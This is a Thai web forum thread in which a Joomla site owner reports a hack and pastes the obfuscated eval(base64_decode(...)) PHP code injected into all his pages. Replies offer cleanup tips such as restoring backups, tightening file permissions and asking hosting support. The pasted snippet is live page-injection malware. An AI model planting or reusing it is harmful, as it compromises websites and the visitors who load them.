โดนแฮกเว็บพังใครรู้บ้าง PHP

Shuriken · 21 เมษายน 2009, 21:11:41

เว็บผมทำจาก joomla โดนแฮ็กครับ โดนแทรกโค๊ด <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9yZWxheHRoYS9wdWJsaWNfaHRtbC9iaXJkL2xpYi9wZWFyL2RvYy9DYWxlbmRhci9kb2NzL2V4YW1wbGVzL2NvcHBlci5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS9yZWxheHRoYS9wdWJsaWNfaHRtbC9iaXJkL2xpYi9wZWFyL2RvYy9DYWxlbmRhci9kb2NzL2V4YW1wbGVzL2NvcHBlci5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJyQxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?> ทุกหน้าที่เป็น PHP เลยครับ กำลังลบโค๊ดนี่อยู่แต่ว่า มันมีหลายไฟล์ PHP มากเลย ใครรู้บ้างครับว่าแก้ PHP ไฟล์เดียวแล้วให้มีผลถึงทุกไฟล์เลย ทำอย่างไร หรือว่าผมต้องนั่งทำทีละไฟล์ครับ

ขอบคุณมากครับ

aussavin · 21 เมษายน 2009, 21:33:02

เศร้าครับ เป็นผมสำรองข้อมูลไว้แล้ว ค่อยลงใหม่ครับ

เพิ่งโดนแทรก IFRAME ไป

Shuriken · 21 เมษายน 2009, 21:54:58

ทำไมตอนนี้เห็นระบากกันมากเลยครับ พวกแฮกเว็บแทรกโค๊ด คนทำคงรู้สึกภูมิใจมากเลยมั้งเนี่ย ที่ทำให้ชาวบ้านเค้าเดือดร้อนได้

g-ji · 21 เมษายน 2009, 22:45:01

กรรม พึ่งจะโดนโค้ดคล้ายๆ กันนี้ไปเมื่อตอนต้นเดือน

ยังดี มันติดแค่ ไฟล์ที่ CHMOD 777 ซึ่งมันมีไม่กี่ไฟล์ (ประมาณ5-7ไฟล์) แถมมันสร้าง ไฟล์เพิ่มใน DIR นั้นได้ด้วยซะงั้น อันนี้สิเยอะ ลบกันเมื่อยเลย

ปัจจุบัน 644 มันทุก DIR (หลักๆ ย่อยๆ ไม่ได้เปลี่ยน)

ไม่รู้ว่ามันมาจากไหนเหมือนกัน

kanokk · 21 เมษายน 2009, 22:56:05

เมลล์ให้ซัพพอร์ตลบให้คับ
เคยโดนเหมือนกัน เหอๆ

โดนแฮกเว็บพังใครรู้บ้าง PHP

Shuriken

aussavin

Shuriken

g-ji

kanokk